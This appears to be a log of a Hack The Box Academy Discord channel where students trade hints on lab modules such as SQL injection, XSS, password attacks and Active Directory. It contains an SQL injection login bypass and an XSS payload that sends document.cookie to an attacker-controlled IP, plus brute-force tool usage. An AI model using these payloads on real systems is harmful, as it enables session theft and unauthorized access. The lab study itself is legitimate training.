#modules

tried a couple of browsers

its the "external recon and enumeration principles" section

oh n/m it worked eventually

mhmmm yes and no. A red team path Im looking more for C2 usage. Looking more for some evasion and OPSEC etc...

have you looked for databases?

AD module tells me to RDP to Parrot VM, open Wireshark and begin capturing traffic.. If I open Wireshark from tools menu it asks for htb-student password and then just never opens the GUI.. If I try to launch via terminal i get permission denied while trying to capture

I guess I don't need to do it anyway but 5 months on and this hasn't been fixed? 😐

hi
i have a doubt
the sc.nextLine in java always skip a line
how to solve that

Can anyone give me a real world example of non-public sub-domain usage?

Or a reason for why non-public sub-domains would be used outside of testing/learning like in the HTB network.

Sorry... which module and section are you referring to?

this one from Active Directory module on pentest track, it's not needed for the exercises but tells you to login and try.. looks like just permissions issue

Could i text someone about the Module "Active Directory Enumeration & Attacks" section "Privileged Access"?

🙂

Password Attacks - Easy Lab - ran hydra with the username/password.list against FTP and SSh for two hours, and got nothing. Hints? this is super unrealistic

Try incresing the number of threads, for me it took >25minutes

Active Directory - Internal Password Spraying - from Linux gives two examples to brute force the password. The bash-one liner works for me but the kerbrute password spray (using same users, password, domain, dc etc..) doesn't work, anybody experienced this or know why it might be? n/m i checked with verbose flag, it was because i locked the user accounts 😅

Hi guys I wanted to ask who do I need to speak to regarding the Pentesting academy please I want to enroll on the pentesting course plus purchase the exam voucher are there any offers on that from HTB thank you.

Heello
Modul SQL Injection Fundamentals, question:
Login as the user with the id 5 to get the flag

the sql querry is:
SELECT * FROM logins WHERE (username='admin' AND id > 1) AND password = '21232f297a57a5a743894a0e4a801fc3';

i tried this:
admin') AND id >4 AND id <6# -

Am I even close? haha

admin') AND id = '5' # -
this did also not work...

any hint in a direction would be nice 😉

do you know what DB its running, that would help inform what would be ideal to terminate the sqli query with.

also your parens placement for your sqli is a bit wrong

youre terminating the where close early by doing so

mh..not sure...mariadb could be

Anyone know how to test a found username against a password list for SMB? Currently on Attacking Common services module and stuck on the second question. Can't figure out how to brute force the username against the list without being lock outed for too many failed attempts.

Password Attacks Medium Lab - how'd yall get ||Dennis||

Okay I feel must be user error of some sort, but im on the skills assessment for the Shells and Payload module, but I cant actually login with the provided credentials for the foothold.

I get the login screen from the NoMachine interface, but then trying to sign into the htb-student account with HTB_@cademy_stdnt! doesnt work.

Says you can also login with ssh, but ssh is refusing connections.

be aware that it is a en-us keyboard, for me I had to use the On Screen keyboard in order to use the proper characters.

not sure if it helps but i was having issues cause of it

I mean, so is mine, but ill try it

ah the pwnbox keyboard was diff for some reason, annoying lol

@cosmic dock in the database

Stuck on the last question for the DNS section of the footprinting module. I'm pretty sure I know what technique to use (per the hint) but I'm struggling to find the ||wordlist|| that will work. Can someone DM to nudge me in the right direction?

It should be a ||“fierce” wordlist||

Damn I know I tried that. I’ll run it again. Thanks for the tip

I'm working on password attaks - password mutations and hydra has been taking me over an hour and it won't crack the user sam's password. can someone please dm me the password to that user? or even just give me a hint to make the command run faster

DID ANYONE PASS THE FIRST ACTIVE DIRECTORY ASSESSMENT?

Need a sanity check for the last flag

I mean if you reached that far maybe you could help me on the Privileged Access lmao

Remind me the question, I don't have my laptop with me

Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.

the hint says to use mssqlclient but it gets "ConnectionRefusedError: [Errno 111] Connection refused" and according to my scans the port is filtered.

Ok I tried running that a few times and nothing came up...

Paste the command you're using

The one they use on the section

||/usr/bin/impacket-mssqlclient INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth||

Try mssqlclient.py

sudo python3 mssqlclient.py <...>

same error

https://academy.hackthebox.com/achievement/433014/160 anyone else thinks that SOAP APIs are weird? OMG!!!

it doesn't even try to authenticate to mssql cause the tcp handshake gets refused

hello, anywone who can helpme with task 1 of " Introduction to Assembly" assessment? im really stuck there =/

Figured it out. I was so focused in the command i wassnt seeing the obvious

thx anyways 🙂

Anyone free to help with Intro to File Upload Attacks? I'm on the whitelist section.

1. ||I've found a few extensions that say they upload||.
2. ||I found the directory they should have been uploaded to||.
3. I'm getting a 404 when trying to access them.

Disregard.

Can i get you help with this module if you dont mind im stuck on the part where im trying to figure out which payload works

Hello im currently trying to figure out which payload i can use for the session hijacking module all the ones ive used are in my notepad but none of them worked in my NC listener perhaps i typed something wrong??

nvm i got now!!!

the||one that start with "><script|| worked perfectly for me, have you tried it on ||picture|| input field?

Hello Everybody

yea i did it worked thank you

i actually have another question once i find the working parameter am i supposed to navigate to another page to use it? or am i waiting for the user to enter their creds?

because im just sitting here waiting lol

can you give me a hint, same spot you were before.... seems I keep missing it 🙂 even if its before my eyes 🙂

once you identify the input field which is vulnerable then you need to follow the steps just like explained in that section, craft your payload in script.js file then run the php server, once you submit it you'll get a cookie.

lol, it's instant no need to wait...

think about how you got in. set of creds?

yea i tried that and used this payload "><script src=http://10.10.14.247:443/new Image().src='http://10.10.14.247:443/index.php?c='+document.cookie;></script>
but i got nothing lol

wait are you doing the skills assessment?

no the session hijacking

So for Shells and Payload skill assessment host 2, I understand the exploit and completing it no problem, except that the exploit in question requires a working username and password that is provided to you by the hint in the module scenario section. My question is are you supposed to only know this from clicking the hint, or was there a different intended path for finding this info yourself?

then you're using the wrong payload, it should be like this ||"><script src="http://your IP/script.js"></script>||

in ||script.js|| your payload will look like this ||new Image().src='http://your IP/index.php?c='+document.cookie|| it needs to be in the same directory where the php server is running

can i DM you real quick?

should use tom user/pass somewhere... right?

Hi, can someone help me with this question : "Find the percentage of users with a path to Domain Admin. Submit just the number as your answer (to two decimal points, i.e. 9.78)." (Module - BloodHound Skill assessments) thank you

did you solve this? dont know how to access mysql... I'm burnt 💥

DM me 😉

does any one want to help me with python

I'm just going to come out and say it.. the Abusing Intermediary Applications AJP section is so confusing and should be removed. I just blindly followed the instructions, but in the end don't understand a single thing I did

The following SSRF section is cool though. Extremely insane and just reading it made me have to go to bed now, but at least I have decent understanding of what's happening and how to do it tomorrow

im curious, which module is this?

Just curious what other web related courses have you done? I felt the same way about SQLMap Essentials but when I took it I was brand new to web so I was mostly just reproduced sample commands hoping something would stick

I do recall one or two sections in Server-Side attacks felt super long and I kind of lost attention and skipped to the end. Also the skills assessment is not up to par.

Server-Side attacks I believe

Server side attacks

This is my first course, total newbie, apart from some portswigger labs. The SQLMap section was rough near the end, had trouble figuring out when to use prefix, etc, but managed to get through it by using this chat for hints

Nice. We definitely plan to review the module and update older content to meet our new quality control criteria.

If you plan on going through the bug bounty hunter path, the Command Injections , Web Attacks, File Upload Attacks are all excellent and really build off each other

vert cohesive

*very

I'm about 60% done the bug bounty hunter path, and I'm really enjoying it. The AJP section of Server side attacks just wasn't clear. I still don't even know what I did and why

Those were amazing modules, really enjoyed them and took down notes because everything really made a lot of sense

Definitely appreciate your feedback though. This module was done by a contractor I believe so ill need to check with the team to see what we wanna do when it comes time for module review/updating

I plan on doing every single module offered by the academy and I do want to get the bug bounty hunter certification at the end. It's more of a fun challenge for me than anything else. Not really sure anyone would hire a newbie with only 1 security certification, but who knows

At least from my observations its mostly about connections and who you know... certifications are great but ultimately it comes down to you sitting in front of another person and having a conversation and at that point its gonna be your confidence and skill/experience that gets you the job , not some recruiter seeing a cert on your resume

That makes sense, it feels very different. I'm actually impressed with the SSRF section, but it could use some more newbie friendly explanations. Whoever did it really made an effort into making a complex lab, that's for sure

Yes personally i really enjoyed the module because I had never seen SSRF and SSTI broken down in a way to where I could actually interact and do the thing

The plan is to start doing bug bounties to build up a bit of reputation

SSRF seems complicated to setup in a lab environment, so I'm impressed with the section, hopefully I can solve it tomorrow with a well rested mind

let me know what you think about the skills assessment

not that I recognize many staff yet, but interactions like this jarednexgent is why youre my current favorite staff member.

Will do, I usually come in here to cry when the skills assessments beat me up, so I'll try to do an objective review of it once it's complete

Hi, has someone finished the printingfoot module? im stuck in a question

hehe thanks dawg 🙂 Hope you are enjoying the modules!

hi everyone! ok so im on the attacking common apps module doing the worpress exploitation and i cant find the flag in the webroot! I tried find / -name flag.txt 2>/dev/null to locate it but I cant find it! any advice would be greatly appreciated

I am, almost 30% of the way through the cpts course

its not in /var/www 😦

Just pulled up my notes... hopefully this is the right section 😉

thanks 🙂

hmm the flag isnt there lol

oh wait

im blind lol

thx 😄

np!

im stuck in the last question of SMB that says "What is the full system path of that specific share?"
I found the path with "netshareenumall" but its incorrect when I submit that as the answer, can someone help me, pls

its a weird formatting issue, feel free to dm 😉

ok, thx

Doing the footprint lab hard - can i get a hint regarding next step once sshd in? I know I need to access the mysql but dont know how.... t## user dont have access, and dont know how to grab other users credentials. THKS!

DM me 🙂

Hello all, can someone please help me on the skills assessment of pivoting module?

Thks Man! needed that extra tip.

Question regarding Information Gathering module, Active Infrastructure Identification part. I spawned a target, but there are also vHosts mentioned. Going to any of the vHost adresses is timing out. Scanning a provided IP doesn't return any Apache service (first question asks about the version of Apache). What am I missing?

Do I need to add both names to /etc/hosts? If so - both with the same IP? O.o

yes, but you shouldnt be timing out on scanning.

How will it be decided which vHost I will reach if both will be assigned the same IP? I mean with curl -I -H "host: ..." it's clear but for other stuff? Say when I type the IP into the browser?

Heya

Am a newbie

when you type in the IP itll go to the default page, which may be a particular host or could just be a server default page, depends on how the server is configured. For your browser, the vhost you put in gets used as a header exactly like in your curl example with the same results.

Same for every other tool, presuming they support headers.

this is how shared hosting servers work in the real world.

Thank you. I think I get it now 🙂

np

If anyone can help me with the final assessment in the SQLmap module pls dm me

hi everybody
i have two screens, when i use kali on my notebook screen than everything is so small.
i use vmware and i also tried other Screen Resolutions but nothing seems to be a good solution.
does anybody know the problem?

found it. HiDPI mode 😉

@west olive crawl the site and you'll find a post request 😉

Thank you

Hi guys, unprivileged user can run "lsof" command under root priv. How I can escalate to root?

sup guys, have any of you been doing recently the Attacking Common Services module? Especially first task Attacking SMB. I've been stuck on it whole day

and my question is if it's not corrupted or something

what issue are you facing?

i cant download id_rsa from GGJ share

@dire birch you will need credentials to download it

you will figure out the credentials in second question

ye thats what i thought

but idk where resource is

it's on top right in the webpage

under cheat sheet

no way

much thanks

i spent 3h on that

ahaha

hi everyone, can I get a hint on "Broken Authentication" module "Brute Force Cookies" Question # 2? I have tried several decoding methods including url decode, base64, base32 and much more?
Any hint please?

Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer.

Hey, did anyone have such error while running ticket converter?

ImportError: cannot import name 'KeyBlock' from 'impacket.krb5.ccache'

Hey guys

Where do I look for the credentials of MySQL at password attacks section ‘Password Reuse / Default passwords’ ?

can i dm someone about this question?

academy
Footprinting
dns```

They have the HTB pwnbox on the parrotsec downloads page

You can use it through the browser if you don't want to run a parrot vm on your machine and you wouldn't need to download it if you go that route

Anyone?

hi @amber sorrel how did you manage to make it done? any hint please

can I DM you @drifting knoll for this?

guys im doing crackmapexec with --users. I have list of users but how can i save this to a file to to password spraying?

I'm not sure then. You can do the regular ParrotOS, it should be pretty close

There is also a #710108839063846964 channel you can check

help with Web Attacks Skills Assessment. I am able to enumerate the users but i dont see any with username admin or similar and the json does not have a field like role etc

Feel free to dm me if you still need help 😊

Ok let's calm down.
Please keep the channel on topic, as for any NFT discussion, this is not the place.
Thank you for understanding @stone gale and @raven cairn .

@rich mulch check gtfo.bin

@sly grotto did you figure out what fqdn ends with "203"? If not make sure you are adding the target to your /etc/hosts file
Also make sure you dnsenum all sub domains. The answer will stare you in the face.

Need Help. Web Attacks - Skills Assessment "Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'."

GtFo bin does not help bro

I found this but does not understand how to inject

https://www.google.com/url?sa=t&source=web&rct=j&url=https://snyk.io/vuln/SNYK-JS-LSOF-543632&ved=2ahUKEwjLlraVw-D6AhWmGrcAHbhvCDgQFnoECBoQAQ&usg=AOvVaw2ZWrh3uKsOjiMegsVxvp7g

Can anyone can light me up?

thatd be a version specific vuln for lsof

But how to inject?

I read the POC but does not understand

I did try lsof then after that is Command Injection but does not work

Sudo lsfo -i :80&&whoami

have you checked if its even a vulnerable version

Cannot find on searchploit

As well as in google

When I check sudo -l

It say lsof can run no pass, under of rooy

Must be do something related to this

right maybe

so

have you checked the version yet

Yes

What should I do next?

and whats the version

Revision 4.93.2

I dont see a vuln for that version

Hey guys. Just stopped for a moment to ask how do you guys writing notes while studying ? I’m using CherryTree and it’s really nice but I think there are more organised tools. Any suggestions?

however I do see that it gives you file read access for other files, perhaps you need to use that to find a more useful file

I am using keepnots

notes*

I am having a weird issue with one of the modules, Active Subdomain Enumeration, its telling me to get the nameserver FQDN but every time I go to try using dig or nslookup to get the info needed it says it can't locate the server inlanefreight.htb. I have tried putting the server in the hosts file hell I even put the dns servers that the pwnbox use in the resolv.conf just to try and get something but nothing

you can @ the server directly as part of the dig command

I even tried that dig ns Name@IP

Where did u get this

space needed

google

as in, I googled what lsof does

Can u sendme command to read file

Example

nvm doesnt actually read file contents, but could still potentially help you find interesting files opened by other users or even kill other processes (which might mean sending other signals to other processes!!)

https://www.thegeekstuff.com/2012/08/lsof-command-examples/

Ok so it gives me info but not what I am needing

There are only root and unprivilege user

You cannot kill other process

Because it need sudo kill

I have the same problem.

netname: print$
remark: Printer Drivers
path: C:\var\lib\samba\printers
password:
netname: sambashare
remark: InFreight SMB v3.1
path: C:\home\sambauser
password:
netname: IPC$
remark: IPC Service (InlaneFreight SMB server (Samba, Ubuntu))
path: C:\tmp
password:

Kill command is not in the list to run under root priv

lsof can kill processes if you read the link I sent

I'm also stuck on this question however I've already decoded the cookie. Use cyberchef and after you've done a step or two look for the magic wand next to Output, that will take you the rest of the way

@west canopy I finished the server side skills assessment and it was definitely anticlimactic. I'm almost certain the entire module could benefit from a rework. Some stuff can be removed and maybe only focus on SSRF and SSTI.

Can anyone help me with flag6 sqlmap?

Web Attacks Skills Assessment. Able to change|| uid in profile page and end up with admin profile|| but not sure what to do from there.

Where are you stuck?

Been woking on it for a while. use the hint prefix. still getting nothing

Ok, i'll load it up and have a look, will be good practice

Nice

Can you PM me your sqlmap command? Mine is working

The Password Attacks module is pure agony with how long some of these mandatory brutes require.

kinda feels like its just wasting my time tbh

anyone completed "Web Attacks" Skills Assessment that can help me?

Yes! I did it!

Would you mind a DM?

Sory! I was celebrating that i found the solution about smb from yesterday. I did not solve your problem.

no worries 🙂 and congrats

Sorry for ping, but I agree. Skills assessment was gimmicky, rest of the module was very solid.

yes I tend to agree... thanks for your feedback 😉

need hint on WordPress - Discovery & Enumeration

anyone available ?

does anyone know how to hack well with kali linux?

thats such a vague question

whats your actual question

I don't speak English, okay?

No problem. Your english is pretty good.

Thank you

I am interested in learning how to hack a vulnerable website with kali linux

CBBH is a good start

Have to keep it legal on this server tho

will you teach me how to hack????

nothing to do with english skills. just gotta ask a specific question or else nobody can help you.

its like asking how do you fix a car, how do you make art, how do you build a building, how can I farm

ok man relax!

@meager stump fr fr if you have any questions lmk

dont worry I am chill, Im just trying to help you help yourself. And I used an analogy to demonstrate why your question wasnt a helpful question for getting the kind of information youre looking for.

He’s being realistic. We’re hear to help you at the end of the day.

I know, it is difficult to specify some things in English

Just wondering. What is your first language?

probably Spanish/Portuguese

siiiiiiiiiiiiiiiiiiiii

able to get uid and token of administrator type user for web attacks skills assessment but confused as to how to proceed. only links i can click are settings and profile. clicking profile takes me back as htb-student and clicking settings and trying to change admin password says access denied

i got you bro. lol

@amber sorrel use https://github.com/s0md3v/Decodify + Cyberchef. if you want just an spoiler, dm me

any hint for the Attacking Enterprise Networks module section External Information Gathering question 3 "What is the FQDN of the associated subdomain?" i have no idea which FQDN for which subdomain do i need

Any hint for SQLMAP case10?

Hello again so ive been working on the XSS skills assessment and im stuck ive tried all the payloads from the session hijacking module and nothing has worked do you have any tips please?

im not at this spot yet, but is that the correct way to write the address in the script? it wouldn't be src=http:server_ip:port ? i honestly dont know...just being observant

run metasploitable 2 in a virtual machine and try attacking it. it is a good learning machine. you can adjust the security of it as well. has many webapps etc. in addition learn the HTB machines and go through the HTB Academy.

hey just to clarify, when it says "vHosts needed for these questions: status.inlanefreight.local" do we just map it to the targetted IP that just spawned?

yes

lol dam your right hahahah

can someone help me with this?

@thorn urchin Thank you

I'm on the Find Files and Directories module

I am trying the find command like this:

find / -type f -name *.conf -size +25K -size -28k -newermt 2020-03-03

it doesn't show me the file

what am I doing wrong here?

can someone help me out?

XSS Discovery- I know it is supposed to be susceptible to reflected but when i enter the same reflection script as in a previous step it doesnt create the alert pop up

never mind I found answer

anyone around finish skills assessment 1 of active directory enumeration?

Hello guys

Please: Nmap IDS/IPS Evasion Hard Lab ... am I looking at DNS? Or the "high-number-port". Just give me that, at least.

I've come down to copy/pasting the module commands at this point (replacing the port # of course)

because I don't know what else to do. I've been at this on/off for months

Tried combinations of changing trusted-source-port(53), fragmenting, ACK, no-arp, I've even tried spoofing source IP. Tried copy/paste the friggin commands from HTB. The only thing I haven't tried is Zomby-ing from a jump server, which wouldn't make sense under the context

I know what these things are. I'm not just blindly following instruction.

and it's either port 53 or 50,000. nothing else makes sense

AD / RESPONDER

We can capture the hash of an account in the network, if the account/user does a broadcast because he doesnt know where to resolve the Name of a Server requested.

--> But how realistic is that?
I mean, does this broadcast only happen if the account/user mistype the Server Name ??

This can not happen to often, does it ?

I can help. DM me

hey guys im on the attacking common services module and trying to do the mssql stuff. I have a password for mssqlsvc, but can't log in to see flagdb. Can anyone help :)?

I tried to psexec and wmiexec since sql accounts are usually local admins on their server... but it never returns anything

I can help. DM me

Hey, I've been stuck on the command injection skills assessment for so long, I know the vulnerable parameter and I can escape the blacklisted charaters but cant manage to find the flag.txt file, can someone please help me

Anybody else having problems with sublist3r? I tried both local and Pwnbox, all engines toghether and separate, my target and websites such as google, and it's not returning any results. Like no subdomains existed for google or github 😄 I tried to use it for skill assessment of information gathering as suggested in the hint, but in the end had to do it manually, due to the above :/

Haven't done the module yet, but usually it should be in the home directory, nah?

yeah, but I get an error message saying the i dont have permission to this directory

Siblist3t not working for u?

Hi!!
Who passed the task:
Attacking Domain Trusts - Child -> Parent Trusts - from Linux

Module: -AD Enumeration & Attacks
?
Under what account did you receive the NTLM cache for bross?

At the time I used the tool it worked fine though I’ve read some comments later where it was having some issues

Maybe the domains are the problem … I will take a look at it

When you say you did it manually you mean with dig and Nslookup?

hello, anywone who can helpme with task 1 of " Introduction to Assembly" assessment? im still stuck there =/, thanks in advance!

Hi

I am new in cs cyber security

Please help me in understanding it

@inland charm if you manage to execute commands, think the most obvious way of show the results. For the encoding and format of the injection i shared here a tool called 1nj3ct0r that i did. After that think outside of the box to get the flag file into your available files

I tried to move file /flag.txt into the tmp folder to be able to view it

But I got permission denied error

It is not the /tmp folder, enumerate better the site to see, it is a custom /tmp folder

Somepath/tmp

@inland charm you're almost there

Okay thank youu I’ll try again

nevermind, i've solved ! 🙂

for the footprinting academy medium lab, can someone get me a hint for the right syntax for the SQL db query? just missing that to get the flag. thank you

@warm sand what is the problem

hey sorry, figured it out.. was querying it wrong..thanks for the reply

Need help with active directory skill assessment II + 1 Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

im stuck on fundamentals module with Service and Process management. when i run systemctl start ssh it asks for authentication

@vagrant field you are root?? Try "sudo su" first or "sudo systemctl start ssh"

Can I get a nudge on the XSS Skills Assessment? Having no luck with any payload.

Ope, nevermind. Got it

@warm turret im also stuck on the linux fundamental module and when I write sudo before the command I get this response: "htb-student is not in the sudoers file. This incident will be reported."

or if anybody else can help me with my issue, I'll be very thankful

can anyone help me with the password attacks module, ive been stuck for 5 days now and im just at my wits end

systemctl enable ssh returns uninitialized value:
Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable ssh
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.

can anyone help me please?

@pseudo ledge no idea then, sorry. i did it a year ago 🙂

if u want a nitro gen dm me
(online version no virus)

Cyber chef is pretty easy to use if you want to give that a shot

idk where to put this but man has htb helped me get back to working on pc's doing something i am falling in love with

facts..i was telling myself this same thing last night.

Hi guys

Anybody there

sup

Am cool

Am new here

Wats d platform all abt

I nid someone to help me with some hacking problems, please message me if u can

omg

i got it

😫 i was grabbing the wrong cookie...

hand in the wrong jar hmmm

haha

For the Active Directory Skill assessment II. Should I be brute forcing ?to get the username and password. Im on this question Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

Hey, new here and I'm kind of confused. I'm in Linux Fundamentals and 15-30sec after I launch the pwnbox it goes grey screen and bottom right says disconnected. I then hit reset but its a brand new instance. All my progress and previous command line inputs gone and I have to keep starting over and I can't progress. How/what do I need to do so it stops doing that?

help

i am lost on Burpsuite

So I'm working on File Inclusion Basic Bypasses and I'm struggling to snag the flag. I'm using the path it gives (index.php?language=languages/) and I've tried truncating with ||....//|| but no matter what I put after it, I seem to not be able to get it

any one have a idea why bike module is not showing the email part in burp

I need help with something really quick. I know that this command should get me the number of total packages installed:

apt list --installed | wc -l

I'm doing the file descriptors and redirections section of Linux Fundamentals module

could someone give me a hint

If you still need help on this, DM me

nope I solved it

but thanks

hi I think that I am going to finish Linux Fundamentals Module tomorrow for sure

I'm gonna do this last two modules tomorrow and its gonna be great

I just gotta get my work done in the morning

With crt.sh I think. But yeah, I just wonder whether I do something wrong, or if there’s a bug in sublist3r perhaps

Hello guys

I have been on a rush yesterday but let me see if I can give it a quick shot during the day and I let you know if the tool has a bug

@molten marlin you can try connecting from your own VM using OpenVPN

Not working for me either sublist3r

@west canopy @distant oar could you please take a look at sublist3r in the skills assessment - information gathering ? Tool doesn’t seem to be working now though it worked in the past

Thanks!

did you find out the answer to this? im following the steps of module but same issue with password

tried basically every username and password ive come across throughout the module :/

oh n/m, got it

Nope, unfortunately, I have marked this task under "?" so far.
I wonder how jarednexgent managed to do this under adunn))🤔
#modules message

yeh i was able to replicate the steps ok with htb-student_adm user but didnt get the bross user hash yet :/

Site is not down, its just blacklisted by alot of ISP. Use a VPN to download the binary(thats what i did)

Hey guys, I’m at passwords attacks module section Credential hunting. At question 5 - do I really need to fully install ansible to look for those credentials ?

?

no

Any guys there?

I need help

Idk hacking

I want to learn for free

Yeah but i doesnt know much

Can you guys dm me some cool tricks in hacking?

@dense maple i am beginner

What do you know in hacking, a little? Idk a little too

just run through begginer courses

I want to learn for free

the level 0 courses are free

I can not be connected to the server...

I am in the module "Getting Started" and the part name is "Service Scanning".

They torcher me by calling

run with -v and see if packets are being recieved

100% packet loss.

okay - Sp see what happens

-Sp ?

one second i may be thinking of another tool

is this local host?

?

same server?

?

are you pinging in your own server/network

^

first you should actuall use nmap then -Sc

then add IP

the script should start with nmap (-) (-)

xa DNS

I have to see the version but I can not...

and you are root?

man nmap

use man nmap or nmap -h and it will give you version type

Hi everyone, I'm new to security, I've been doing a couple of THM, looking to further studies on HTB.

@brazen saffron usu nmap -Sl and -Pn -Sc and see what it gives you and you should have an answer

add -sV

and is you are looking for OS version -O

use -A if those dont work

I've been stuck on the command injection skills assessment for sooo long I literally tried everything and still no hope, I know how to escape the blacklisted characters and I know which parameter is vulnerable. My main problem is when I try the cat command or any other command it is treated as a filename and does not execute as a command, can someone please help me? I can explain in more detail, but it's better to do privately to avoid any spoilers.

@brazen saffron did you use -sL

can someone help me with password attacks - attacking sam "Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer." i believe i have to launch cmd as a first step but i don't see that

Need help with Attacking Tomcat Question 2. Perform a login bruteforcing attack against Tomcat manager at http://web01.inlanefreight.local:8180. What is the valid password? mgr_brute.py and metasploit module don't seem to get me the password.

i was able to figure out the password by looking at the password wordlist and entering manually but not understanding why the previous 2 tools did not work. i also took the password list and prepend the username and encode in burp, still nothing.

Can anyone help me put with the phishing section on the XSS module

anyone available to help with Attacking Tomcat section of Attacking Common Web Applications had to reboot everything and am ok now

anyone around to help with the Footprinting Medium lab? I've been stuck for a while.

@copper coral where are u stuck

i can try to help. whats up

who can i reach out to, to get help on an assessment question? something aint right with it...

which assessment? i can check if i have done it

sorry, i am working on JPT not CBBH, so i wont be able to help/look at all.

k ty

I tried as well and...

yea the hint is BS. There's a couple other things in that module I did not like

I agree … I completed the module some time ago but I think it could be reviewed to improve it

Thanks @west canopy

i'm on password attacks hard and found the kdbx file but i'm struggling on downloading it, can someone help me

Hey i have a question. I am currently on a challenge and i've read the code like 100 times and found two vulns that i have to compare somehow but im just not able to do this. Can someone give me an hint? Would be cool thanks

still looking for help on this.

Where you at?

Python server

I had to resume it a few times with hydra -R. Eventually it found the user/pass

yeee

HOW do I use this server I just joined

I want to continue backing

But stickers on this bullshit thesis

Stuck*

Fuck school duwde

What is the right way to kill a python web/upload server so when I try and make a new one I don't get the following error ?

CTRL + C

Thats what ive been doing

when I try to remake the server I get that error saying the socket is still in use

Somewhere there is still a service running on port 8000

how do I kill it then as it should of stopped once I killed the server

I tried killing my python process but that didnt work either

try running: sudo lsof -i :8000

this will tell you what process is using port 8000

then we can kill it 😉

netstat -npl

netstat npl got it

looks like I was hitting ctrl z

which i've now learned puts it in the background instead of killing it like ctrl c

Finally another tricky module finished. This File upload attacks, i almost asked for a hint on the skill assesement 🙂 https://academy.hackthebox.com/achievement/433014/136

@pastel ginkgo you can also try: netstat -antp

then just kill PID

Can anyone give me a hand with the phishing section on the xss module I'm pretty sure I have the right payload to execute the script on the page but the last bit removing the img input field isn't working and when I try to usnc to listen it tells me the ports in use and it says quiting

Hey! I need a hint in password attacks medium lab. I found J***** creds and the smb creds for D**** user but doesn't work the D smb cred to login with ssh.

Done. If you need a hint just think where you can store data. Search for a proccess ||top coommand|| ||database||

hi im stuck at Windows Privilege Escalation Skills Assessment - Part I i cant get reverse shell can anyone give a hint

read back through the module where it talks about dns

read what it says

if youre copying the scans its not gunna work. It tells you a variation to try out in the actual text.

then im afraid you do not understand

changing the IP is a given. but you cannot copy the scans. you must understand what it says and be able to decide how to adjust the scan to get the results.

this is as much advice as Im willing to give, good luck.

you use your brain and think critically about the material instead of copying things.

theres a variation to try out for this situation that it specifically says to try for such a situation

Chill out, Im giving you help, but Im not giving you the answer. You must still reach that on your own. but with this kind of question there isnt a whole lot of wiggle room for giving advice without just telling you the answer.

you might be able to complete it with ncat as an alternate method

different tool

I’m stuck on Archetype. I can’t seem to get myssqlclient to download. I’ve followed a few videos and googled it. Everytime I try to locate MySQLclient it can’t find it

might work, best of luck

😂

¯_(ツ)_/¯

htb modules often presume a certain level of prerequisite knowledge and flexibility for its content. If youre not ready for that, you may in fact be better served elsewhere first.

????

lets calm down here... he was helping you without giving you the answer and your frustrated

I literally tried to help you and then agreed that yeah there are other learning tools out there that might work better for you???

htb has a reputation for being hard, often too hard

youre not alone in having difficulty with it, thats okay

dude there have been modules where i almost punched my screen...had to walk away clear head and come back and get at it

That sucks, no hard feels from my end. Best of luck.

ceh is mostly rote memorization

it has 0 hands on

HTB wont teach you how to pass the ceh, itll teach you how to actually use the skills in the real world

it is, but the format is multiple choice, no practical exam

ceh is mostly about terms, policies, ect

htb is actually doing the shit

CEH will have you answer what metasploit is. HTB will have you tunnel a metasploit priv escalation exploit over a meterpreter channel on a target host where you got a foothold in by abusing a RCE from an outdated blog software that exists in the real world.

that example is literal btw

havnt heard of em

<which doesnt mean they're bad, I just havnt heard of em>

I mean if you got a voucher might as well take it

its still good for resumes

it just doesnt teach you what you need to know to do the job

sounds like a plan

nah

thx

Tough life Ned

You need a.I. to help you predikt the crypto market and get rich while sleeping

@solid wedge doing hacking for the wrong reason. Try to learn hacking just to be better paid will get you even more frustrated. Try to get a job that you could do for free and the money will come after. I spent 6 years earning $16 by month so... Take what you have, try moving out. Think of structure your life first and then learn to hack because you love it and not for a bigger payout. Do BBH at nights maybe 😉

Has anyone heard of Mystopians on CoralCube and are they any good like CryptoPunks will increase in value?

🙄

Markup, task 1, answer should be 2.4.41 as that is the version of Apache running, and it matches the suggested answer format, but no bueno

nvm, foxyproxy was on 🤦‍♂️

hi..broken authentication module is killing me..i have enumerated two usernames and how to tamper cookies but those two users's are not temperable. i have tried many wordlists and almost have checked 56000 words but no useful username is being found. please give a hint

its relevant to skills assessment

Thanks to jarednexgent, I still picked up the hash of the NTLM account - bross
😅
If you are interested, I will write in a personal message, so as not to spoil it)

its ok thanks, still had the hash from the output of a previous module xD

Anyone done the introduction of python? Can't find the class of x_coordinate. It tells to do IDLE. But I get no response. What am I missing?

Mods please ban this person

This is the 2nd time they have been advertising crypto nonsense

Shut the fuck up please

😭

@urban sage

https://tenor.com/view/summoned-i-have-been-summoned-power-gif-15859341

HTB isn't really the place for cryptocurrencies. You can talk about forensics on the blockchain in #forensics-cryptography but even then, I'm not sure many would have an interest.
Otherwise please refrain from the topic, especially in #modules this isn't the channel for that.

This is a warning btw @stone gale any more and we'll take action. Keep the channels on topic.

I think theres some mystopians shill effort going around. been a lot of people joining the server to just "ask" about mystopians

100% so people go, no whats that? and google it. More likely to work and get eyeballs that just blatant link spam that people tune out.

Hmm, we'll take note of that, I did see many more people than usual ask weird questions about cryptocurrencies lately.

thanks

Thank you mod team. Keep up the good work

🔥🔥🔥

does anyone know why do i get this error msg: ** server can't find inlanefreight.htb: NXDOMAIN

information gethering - web edition/active subdomain enumeration

i added the traget ip with the inlanefreight.htb to the hosts file

Can someone provide a nudge for the active directory assessment? I'm having issues using PSSeSSion to remote into another server. I'm logged in as system and trying to authenticate to another box on the same domain ( as Administrator). Running klist shows i have kerberos tickets stored in cache. However PSSession commands are failing / freezing the shell.

thanks in advance.

Got user1 in Privilege Escalation but cant get the root, the hint is don't forget to chmod but I'm not sure if I'm supposed to chmod the is_rsa

